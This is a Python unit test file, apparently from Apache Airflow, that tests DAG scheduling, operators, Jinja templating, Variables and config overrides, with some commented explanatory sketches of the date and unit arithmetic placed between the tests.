def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(self.TEST_SCHEDULE_RELATIVEDELTA_DAG_ID,
schedule_interval=delta)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where a prior DagRun already exists with the
run_id that the next scheduled run would otherwise receive
"""
delta = timedelta(hours=1)
dag = DAG(self.TEST_SCHEDULE_DAG_FAKE_SCHEDULED_PREVIOUS_DAG_ID,
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(self.TEST_SCHEDULE_ONCE_DAG_ID)
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(self.TEST_SCHEDULE_START_END_DATES_DAG_ID,
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(self.TEST_SCHEDULE_DAG_NO_END_DATE_UP_TO_TODAY_ONLY_DAG_ID,
start_date=start_date,
schedule_interval=delta)
dag.add_task(BaseOperator(task_id='faketastic', owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for _ in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (the docstring's "2016-01-01" case); it should be refused
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
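# To make the arithmetic above concrete: with a daily interval and a
# start_date exactly one week before "now", (now - start_date).days is 7, so
# seven runs are created and the eighth (whose period has not yet completed)
# is refused. A small fixed-date sketch of that calculation; the dates are
# illustrative only.
from datetime import datetime as stdlib_datetime  # aliased so it does not shadow the timezone-aware datetime imported above

example_now = stdlib_datetime(2016, 1, 1)
example_start = stdlib_datetime(2015, 12, 25)   # one week earlier
assert (example_now - example_start).days == 7  # -> seven daily dag runs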
def test_confirm_unittest_mod(self):
self.assertTrue(conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
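# Build a sleep duration that embeds this process's pid (e.g. "10012345"
# seconds) so the spawned `sleep` can be identified unambiguously below via
# psutil. The duration is far longer than the 1-second execution_timeout, so
# the child should already have been killed by the time it is searched for.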
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Use a mutable dict to record the callback result (a holdover from the
# Python 2 days, when nonlocal was unavailable).
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
t = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
exceptions.AirflowException,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_trigger_dagrun(self):
def trigga(_, obj):
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if templates_dict['ds'] != ds:
raise Exception("templates_dict['ds'] did not match ds")
t = PythonOperator(
task_id='test_py_op',
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
'{\n "foo": "bar"\n}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
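# The three variable-templating tests above hinge on the difference between
# var.json.<key> (the deserialized object) and var.value.<key> (the stored
# string). A minimal sketch of that distinction using only the json module;
# `stored` stands in for whatever Variable.set(..., serialize_json=True)
# persists, without reproducing Airflow's exact formatting.
import json

stored = json.dumps({"foo": "bar"})            # what the metastore holds
assert json.loads(stored) == {"foo": "bar"}    # what var.json.<key> yields
assert isinstance(stored, str)                 # what var.value.<key> yields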
def test_template_non_bool(self):
"""
Test that templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT_DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
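# All of the expected values above follow mechanically from DEFAULT_DATE
# (2015-01-01) and the example DAG's daily schedule. A small sketch of those
# derivations with plain datetime arithmetic; the format strings are chosen to
# match the asserted values rather than quoted from Airflow internals.
from datetime import datetime as stdlib_datetime, timedelta as stdlib_timedelta

execution_date = stdlib_datetime(2015, 1, 1)
one_day = stdlib_timedelta(days=1)

assert execution_date.strftime('%Y-%m-%d') == '2015-01-01'              # ds
assert execution_date.strftime('%Y%m%d') == '20150101'                  # ds_nodash
assert (execution_date + one_day).strftime('%Y-%m-%d') == '2015-01-02'  # next_ds / tomorrow_ds
assert (execution_date - one_day).strftime('%Y-%m-%d') == '2014-12-31'  # prev_ds / yesterday_ds
assert execution_date.strftime('%Y%m%dT%H%M%S') == '20150101T000000'    # ts_nodash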
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_raise_key_error(self):
with self.assertRaises(KeyError):
Variable.get("thisIdDoesNotExist")
def test_get_non_existing_var_with_none_default_should_return_none(self):
self.assertIsNone(Variable.get("thisIdDoesNotExist", default_var=None))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Happiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check that both the returned value and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_delete(self):
key = "tested_var_delete"
value = "to be deleted"
# No-op if the variable doesn't exist
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
# Set the variable
Variable.set(key, value)
self.assertEqual(value, Variable.get(key))
# Delete the variable
Variable.delete(key)
with self.assertRaises(KeyError):
Variable.get(key)
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = conf.get('core', 'FERNET_KEY')
with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}):
FALLBACK_FERNET_KEY = conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(conf.has_option("core", "FERNET_KEY"))
self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD"))
with conf_vars({('core', 'fernet_key'): None}):
with self.assertRaises(AirflowConfigException) as cm:
conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar to its original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar to its original state
del os.environ[key]
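# Both override tests rely on Airflow's AIRFLOW__{SECTION}__{KEY} naming
# convention for configuration environment variables. A one-line sketch of
# composing such a name; `airflow_env_var` is an illustrative helper, not an
# Airflow API.
def airflow_env_var(section, key):
    """Build the environment variable name checked for a section/key pair."""
    return "AIRFLOW__{}__{}".format(section.upper(), key.upper())


assert airflow_env_var("core", "fernet_key") == "AIRFLOW__CORE__FERNET_KEY"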
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
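# round_time snaps a datetime to the nearest multiple of the interval counted
# from an anchor start date, never going before the anchor (which is why
# 2015-09-13 rounds up to 2015-09-14 above). A compact sketch of that idea;
# `snap_to_interval` is illustrative and may differ from Airflow's exact
# tie-breaking behaviour.
from datetime import datetime as stdlib_datetime, timedelta as stdlib_timedelta


def snap_to_interval(dt, delta, start):
    """Return the multiple of `delta` after `start` closest to `dt` (never before `start`)."""
    steps = max(0, round((dt - start) / delta))
    return start + steps * delta


assert snap_to_interval(stdlib_datetime(2015, 9, 16), stdlib_timedelta(days=1),
                        stdlib_datetime(2015, 9, 14)) == stdlib_datetime(2015, 9, 16)
assert snap_to_interval(stdlib_datetime(2015, 9, 13), stdlib_timedelta(days=1),
                        stdlib_datetime(2015, 9, 14)) == stdlib_datetime(2015, 9, 14)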
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_array_almost_equal from numpy.testing since we are comparing
# floating-point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
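# The expected arrays above are simply the input seconds divided by the size
# of the target unit (60 for minutes, 3600 for hours, 86400 for days), rounded
# to three decimals. A quick worked check of the 'minutes' case:
seconds_per_unit = {'seconds': 1, 'minutes': 60, 'hours': 3600, 'days': 86400}
scaled_minutes = [s / seconds_per_unit['minutes'] for s in [130, 5400, 10]]
assert [round(v, 3) for v in scaled_minutes] == [2.167, 90.0, 0.167]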
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state gets deleted, it should fail"""
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception:
pass
p_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_run_command(self):
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)), '\u1000foo')
self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object): # pylint: disable=unused-argument
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date, utc_now)
def test_trigger_dagrun_with_str_execution_date(self):
utc_now_str = timezone.utcnow().isoformat()
self.assertIsInstance(utc_now_str, (str,))
run_id = 'trig__' + utc_now_str
def payload_generator(context, object): # pylint: disable=unused-argument
object.run_id = run_id
return object
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now_str,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = DagRun.find(dag_id='example_bash_operator', run_id=run_id)
self.assertEqual(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEqual(dag_run.execution_date.isoformat(), utc_now_str)
def test_trigger_dagrun_with_templated_execution_date(self):
task = TriggerDagRunOperator(
task_id='test_trigger_dagrun_with_str_execution_date',
trigger_dag_id='example_bash_operator',
execution_date='{{ execution_date }}',
dag=self.dag)
self.assertTrue(isinstance(task.execution_date, str))
self.assertEqual(task.execution_date, '{{ execution_date }}')
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.render_templates()
self.assertEqual(timezone.parse(task.execution_date), DEFAULT_DATE)
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
EXECUTION_DATE = DEFAULT_DATE + timedelta(days=2)
EXECUTION_DS = EXECUTION_DATE.strftime('%Y-%m-%d')
EXECUTION_DS_NODASH = EXECUTION_DS.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_id=DagRun.id_for_date(EXECUTION_DATE),
execution_date=EXECUTION_DATE,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=EXECUTION_DATE, end_date=EXECUTION_DATE)
ti = TI(task=task, execution_date=EXECUTION_DATE)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], EXECUTION_DS)
self.assertEqual(context['next_ds_nodash'], EXECUTION_DS_NODASH)
self.assertEqual(context['prev_ds'], EXECUTION_DS)
self.assertEqual(context['prev_ds_nodash'], EXECUTION_DS_NODASH)
class TestCli(unittest.TestCase):
TEST_USER1_EMAIL = 'test-user1@example.com'
TEST_USER2_EMAIL = 'test-user2@example.com'
@classmethod
def setUpClass(cls):
super().setUpClass()
cls._cleanup()
def setUp(self):
super().setUp()
from airflow.www import app as application
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
